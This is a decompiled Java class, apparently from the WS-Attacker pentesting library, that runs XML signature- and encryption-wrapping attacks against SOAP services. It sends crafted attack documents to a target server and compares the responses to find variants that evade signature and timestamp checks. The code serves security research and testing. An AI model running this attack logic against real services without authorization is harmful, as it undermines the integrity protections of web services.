/*
 * Decompiled with CFR 0.152.
 */
package wsattacker.library.xmlencryptionattack.avoidingengine;

import java.util.ArrayList;
import java.util.List;
import javax.xml.namespace.QName;
import javax.xml.xpath.XPathExpressionException;
import org.apache.log4j.Logger;
import org.w3c.dom.Document;
import org.w3c.dom.Element;
import org.w3c.dom.Node;
import org.xml.sax.SAXException;
import uk.ac.shef.wit.simmetrics.similaritymetrics.InterfaceStringMetric;
import wsattacker.library.schemaanalyzer.SchemaAnalyzer;
import wsattacker.library.signatureWrapping.option.Payload;
import wsattacker.library.signatureWrapping.util.exception.InvalidPayloadException;
import wsattacker.library.signatureWrapping.util.exception.InvalidWeaknessException;
import wsattacker.library.signatureWrapping.util.signature.SignatureManager;
import wsattacker.library.signatureWrapping.xpath.weakness.util.WeaknessLog;
import wsattacker.library.signatureWrapping.xpath.wrapping.WrappingOracle;
import wsattacker.library.xmlencryptionattack.avoidingengine.wrappingoracles.EncSigWrappingOracle;
import wsattacker.library.xmlencryptionattack.avoidingengine.wrappingoracles.EncryptionWrappingOracle;
import wsattacker.library.xmlencryptionattack.avoidingengine.wrappingoracles.WrappingOracleIF;
import wsattacker.library.xmlencryptionattack.avoidingengine.wrappingoracles.weakness.FactoryWeakness;
import wsattacker.library.xmlencryptionattack.avoidingengine.wrappingoracles.weakness.WeaknessType;
import wsattacker.library.xmlencryptionattack.detectionengine.detectionmanager.DetectFilterEnum;
import wsattacker.library.xmlencryptionattack.detectionengine.detectionmanager.FactoryFilter;
import wsattacker.library.xmlencryptionattack.detectionengine.detectionstreams.DetectionReport;
import wsattacker.library.xmlencryptionattack.detectionengine.filter.concrete.AvoidedDocErrorFilter;
import wsattacker.library.xmlencryptionattack.detectionengine.filter.info.AbstractDetectionInfo;
import wsattacker.library.xmlencryptionattack.detectionengine.filter.info.AvoidedDocErrorInfo;
import wsattacker.library.xmlencryptionattack.detectionengine.filter.info.SignatureInfo;
import wsattacker.library.xmlencryptionattack.detectionengine.filter.info.TimestampInfo;
import wsattacker.library.xmlencryptionattack.encryptedelements.AbstractEncryptionElement;
import wsattacker.library.xmlencryptionattack.encryptedelements.ElementAttackProperties;
import wsattacker.library.xmlencryptionattack.timestampelement.TimestampBase;
import wsattacker.library.xmlencryptionattack.timestampelement.TimestampElement;
import wsattacker.library.xmlencryptionattack.util.ServerSendCommandIF;
import wsattacker.library.xmlencryptionattack.util.SimStringStrategyFactory;
import wsattacker.library.xmlencryptionattack.util.XMLEncryptionConstants;
import wsattacker.library.xmlutilities.dom.DomUtilities;

public class AvoidingManager {
    private final DetectionReport m_DetectionReport;
    private final Document m_InputFile;
    private double m_WrapErrCmpThreshold = 1.0;
    private Document m_AvoidedFile;
    private final AvoidedDocErrorFilter m_AvoiDocErrFilter;
    private final AbstractEncryptionElement m_EncryptedWrapPay;
    private AbstractEncryptionElement m_AttackPay = null;
    private final SchemaAnalyzer m_SchemaAnalyzer;
    private boolean m_isEncTypeWekaness = false;
    public static final Logger LOG = Logger.getLogger(AvoidingManager.class);

    public AvoidingManager(AbstractEncryptionElement wrapPay, DetectionReport detectRep, SchemaAnalyzer schemaAnalyzer) throws InvalidPayloadException, InvalidWeaknessException {
        this.m_DetectionReport = detectRep;
        this.m_SchemaAnalyzer = schemaAnalyzer;
        this.m_InputFile = this.m_DetectionReport.getRawFile();
        this.m_EncryptedWrapPay = wrapPay;
        ArrayList<QName> filterList = new ArrayList<QName>();
        SignatureInfo sigInfo = (SignatureInfo)this.m_DetectionReport.getDetectionInfo(DetectFilterEnum.SIGNATUREFILTER);
        if (!sigInfo.getUsedPayloads().isEmpty()) {
            for (Payload payload : sigInfo.getUsedPayloads()) {
                Element signedElement = payload.getSignedElement();
                filterList.add(new QName(signedElement.getNamespaceURI(), signedElement.getLocalName()));
            }
        }
        filterList.add(new QName("http://www.w3.org/2000/09/xmldsig#", "SignedInfo"));
        filterList.add(new QName("http://www.w3.org/2000/09/xmldsig#", "SignatureValue"));
        schemaAnalyzer.setFilterList(filterList);
        this.m_AvoiDocErrFilter = (AvoidedDocErrorFilter)FactoryFilter.createFilter(DetectFilterEnum.AVOIDDOCFILTER);
    }

    public void setWrapErrCmpThreshold(double wrapErrCmpThreshold) {
        this.m_WrapErrCmpThreshold = wrapErrCmpThreshold;
    }

    public AbstractEncryptionElement getAttackPay() {
        return this.m_AttackPay;
    }

    public void setAttackPay(AbstractEncryptionElement attackPay) {
        this.m_AttackPay = attackPay;
    }

    public Document getInputFile() {
        return this.m_InputFile;
    }

    public DetectionReport getDetectionReport() {
        return this.m_DetectionReport;
    }

    public Document getAvoidedFile() {
        return this.m_AvoidedFile;
    }

    public void setAvoidedFile(Document avoidedFile) {
        this.m_AvoidedFile = avoidedFile;
    }

    public AvoidedDocErrorInfo getAvoidedDocument(XMLEncryptionConstants.WrappingAttackMode wrapMode, ServerSendCommandIF serverSendCmd) throws InvalidWeaknessException, InvalidPayloadException, SAXException, XPathExpressionException {
        AbstractDetectionInfo errorInfo = null;
        TimestampElement timestamp = null;
        TimestampInfo timeInfo = (TimestampInfo)this.m_DetectionReport.getDetectionInfo(DetectFilterEnum.TIMESTAMPFILTER);
        if (null != timeInfo) {
            timestamp = timeInfo.getTimestamp();
        }
        if (null != timestamp) {
            if (null != timestamp.getDetectionElement()) {
                errorInfo = this.handleTimestamp(timestamp, serverSendCmd, wrapMode);
            }
        } else if (XMLEncryptionConstants.WrappingAttackMode.NO_WRAP != wrapMode) {
            errorInfo = this.executeWrappingAttacks(wrapMode, serverSendCmd);
        }
        if (null == errorInfo) {
            return null;
        }
        return (AvoidedDocErrorInfo)errorInfo;
    }

    private AbstractDetectionInfo handleTimestamp(TimestampBase timestamp, ServerSendCommandIF serverSendCmd, XMLEncryptionConstants.WrappingAttackMode wrapMode) throws InvalidWeaknessException, InvalidPayloadException, XPathExpressionException {
        SignatureManager sigManager = null;
        Object avoidedTimeStampDoc = null;
        AbstractDetectionInfo errorInfo = null;
        SignatureInfo sigInfo = (SignatureInfo)this.m_DetectionReport.getDetectionInfo(DetectFilterEnum.SIGNATUREFILTER);
        if (null != sigInfo) {
            sigManager = sigInfo.getSignatureManager();
        }
        if (timestamp.isSigned()) {
            LOG.warn((Object)"signed timestamp could not avoided");
            errorInfo = this.executeWrappingAttacks(wrapMode, serverSendCmd);
        } else {
            errorInfo = this.executeWrappingAttacks(wrapMode, serverSendCmd);
        }
        return errorInfo;
    }

    private AbstractDetectionInfo executeWrappingAttacks(XMLEncryptionConstants.WrappingAttackMode wrapMode, ServerSendCommandIF serverSendCmd) throws InvalidPayloadException, InvalidWeaknessException {
        WrappingOracleIF wrappOracle = null;
        AbstractDetectionInfo errorInfo = null;
        ElementAttackProperties attackPayProp = this.m_EncryptedWrapPay.getAttackProperties();
        if (XMLEncryptionConstants.WrappingAttackMode.SIGNATURE == wrapMode || XMLEncryptionConstants.WrappingAttackMode.SIG_ENC_WRAP == wrapMode && XMLEncryptionConstants.WrappingAttackMode.ENCRYPTION != attackPayProp.getCurrWrappingMode()) {
            try {
                attackPayProp.setCurrWrappingMode(XMLEncryptionConstants.WrappingAttackMode.SIGNATURE);
                wrappOracle = new EncSigWrappingOracle(this.m_EncryptedWrapPay, this.m_DetectionReport, this.m_SchemaAnalyzer);
                errorInfo = this.startWrappingAttack(wrappOracle, serverSendCmd);
            }
            catch (SAXException ex) {
                LOG.error((Object)ex);
            }
        }
        if ((XMLEncryptionConstants.WrappingAttackMode.ENCRYPTION == wrapMode || XMLEncryptionConstants.WrappingAttackMode.SIG_ENC_WRAP == wrapMode) && null == errorInfo) {
            try {
                attackPayProp.setCurrWrappingMode(XMLEncryptionConstants.WrappingAttackMode.ENCRYPTION);
                wrappOracle = new EncryptionWrappingOracle(this.m_EncryptedWrapPay, this.m_DetectionReport, this.m_SchemaAnalyzer);
                if (this.m_isEncTypeWekaness && 0 < wrappOracle.maxPossibilities()) {
                    wrappOracle.addAdditionalEncryptionWeakness(FactoryWeakness.generateWeakness(WeaknessType.ATTR_TYPE_WEAKNESS, this.m_AttackPay, null));
                }
                errorInfo = this.startWrappingAttack(wrappOracle, serverSendCmd);
            }
            catch (SAXException ex) {
                LOG.error((Object)ex);
            }
        }
        return errorInfo;
    }

    private AbstractDetectionInfo startWrappingAttack(WrappingOracleIF wrappingOracle, ServerSendCommandIF serverSendCmd) throws SAXException, InvalidPayloadException {
        int i;
        int max;
        TimestampElement timestamp = null;
        AbstractDetectionInfo errorInfo = null;
        String responseContent = null;
        String attackDocumentAsString = null;
        Document attackDocument = null;
        ElementAttackProperties attackPayProp = this.m_EncryptedWrapPay.getAttackProperties();
        TimestampInfo timeInfo = (TimestampInfo)this.m_DetectionReport.getDetectionInfo(DetectFilterEnum.TIMESTAMPFILTER);
        if (null != timeInfo) {
            timestamp = timeInfo.getTimestamp();
        }
        if ((max = wrappingOracle.maxPossibilities()) - 1 == (i = attackPayProp.getCurrWrappingPayloadIdx())) {
            attackPayProp.setCurrWrappingPayloadIdx(-1);
        }
        LOG.info((Object)("Found " + max + " wrapping possibilites."));
        ++i;
        while (i < max) {
            block11: {
                LOG.info((Object)("Trying possibility " + (i + 1) + "/" + max));
                try {
                    attackDocument = wrappingOracle.getPossibility(i);
                }
                catch (InvalidWeaknessException e) {
                    LOG.warn((Object)("Could not abuse the weakness. " + e.getMessage()));
                    break block11;
                }
                catch (Exception e) {
                    LOG.error((Object)("Unknown error. " + e.getMessage()));
                    break block11;
                }
                if (null != timestamp) {
                    ((TimestampBase)timestamp).updateTimeStamp(attackDocument);
                }
                LOG.info((Object)WeaknessLog.representation());
                attackDocumentAsString = DomUtilities.domToString((Document)attackDocument);
                responseContent = serverSendCmd.send(attackDocumentAsString);
                if (responseContent == null) {
                    LOG.info((Object)"The server's answer was empty. Server misconfiguration?");
                } else {
                    errorInfo = this.checkIsWrappingMsgValid(attackDocument, responseContent, serverSendCmd);
                    if (null != errorInfo) {
                        attackPayProp.setCurrWrappingPayloadIdx(i);
                        LOG.info((Object)("Possibility " + (i + 1) + ": Wrapping-Document found: \n" + attackDocumentAsString));
                        break;
                    }
                }
            }
            ++i;
        }
        if (null == errorInfo) {
            attackPayProp.setCurrWrappingPayloadIdx(-1);
            attackPayProp.setCurrWrappingMode(XMLEncryptionConstants.WrappingAttackMode.NO_WRAP);
        }
        return errorInfo;
    }

    private AbstractDetectionInfo checkIsWrappingMsgValid(Document attackDocument, String responseContent, ServerSendCommandIF serverSendCmd) {
        String attackErrDocumentAsString = null;
        String responseContentError = null;
        AbstractDetectionInfo errorInfo = null;
        this.m_AvoiDocErrFilter.setPayloadInput(this.m_AttackPay);
        this.m_AvoiDocErrFilter.setInputDocument(attackDocument);
        errorInfo = this.m_AvoiDocErrFilter.process();
        attackErrDocumentAsString = DomUtilities.domToString((Document)((AvoidedDocErrorInfo)errorInfo).getErrorDocument());
        responseContentError = serverSendCmd.send(attackErrDocumentAsString);
        InterfaceStringMetric simStringStrategy = SimStringStrategyFactory.createSimStringStrategy(SimStringStrategyFactory.SimStringStrategy.LEVENSTHEIN);
        if (this.m_WrapErrCmpThreshold <= (double)simStringStrategy.getSimilarity(responseContent, responseContentError)) {
            errorInfo = null;
        }
        return errorInfo;
    }

    private Document getAvoidedTimeStampDoc(WrappingOracle wrappingOracle, ServerSendCommandIF serverSendCmd, TimestampBase timestamp) throws XPathExpressionException {
        int max = wrappingOracle.maxPossibilities();
        Object errorInfo = null;
        String responseContent = null;
        String attackDocumentAsString = null;
        Document attackDocument = null;
        for (int i = 0; i < max; ++i) {
            LOG.info((Object)("Trying possibility " + (i + 1) + "/" + max));
            try {
                attackDocument = wrappingOracle.getPossibility(i);
            }
            catch (InvalidWeaknessException e) {
                LOG.warn((Object)("Could not abuse the weakness. " + e.getMessage()));
                continue;
            }
            catch (Exception e) {
                LOG.error((Object)("Unknown error. " + e.getMessage()));
                continue;
            }
            LOG.info((Object)WeaknessLog.representation());
            attackDocumentAsString = DomUtilities.domToString((Document)attackDocument);
            responseContent = serverSendCmd.send(attackDocumentAsString);
            if (responseContent == null) {
                LOG.info((Object)"The server's answer was empty. Server misconfiguration?");
                continue;
            }
            if (!this.checkIfTimestampValid(attackDocument, responseContent, serverSendCmd, timestamp)) continue;
            return attackDocument;
        }
        return null;
    }

    private boolean checkIfTimestampValid(Document attackDocument, String responseContent, ServerSendCommandIF serverSendCmd, TimestampBase timestamp) throws XPathExpressionException {
        String attackErrDocumentAsString = null;
        String responseContentError = null;
        List timestampList = DomUtilities.evaluateXPath((Document)attackDocument, (String)"//*[local-name()='Timestamp' and namespace-uri()='http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd']");
        if (2 == timestampList.size()) {
            if (((Element)timestampList.get(0)).isEqualNode(timestamp.getDetectionElement())) {
                timestamp.setTimeStampPayloads((Element)timestampList.get(1));
            } else {
                timestamp.setTimeStampPayloads((Element)timestampList.get(0));
            }
        } else {
            throw new IllegalArgumentException("Timestamp-Wrapping without 2 timestamp elements in attack document");
        }
        Document errDocument = DomUtilities.createNewDomFromNode((Node)attackDocument.getDocumentElement());
        Element errPayElement = DomUtilities.findCorrespondingElement((Document)errDocument, (Element)timestamp.getDetectionPayElement());
        TimestampElement timestampError = new TimestampElement(errPayElement);
        timestampError.setCreatedValue("");
        timestampError.setExpiresValue("");
        attackErrDocumentAsString = DomUtilities.domToString((Node)errPayElement);
        responseContentError = serverSendCmd.send(attackErrDocumentAsString);
        InterfaceStringMetric simStringStrategy = SimStringStrategyFactory.createSimStringStrategy(SimStringStrategyFactory.SimStringStrategy.DICE_COEFF);
        return !(this.m_WrapErrCmpThreshold <= (double)simStringStrategy.getSimilarity(responseContent, responseContentError));
    }

    public void setUseEncTypeWeakness(boolean encTypeWeakness) {
        this.m_isEncTypeWekaness = encTypeWeakness;
    }
}

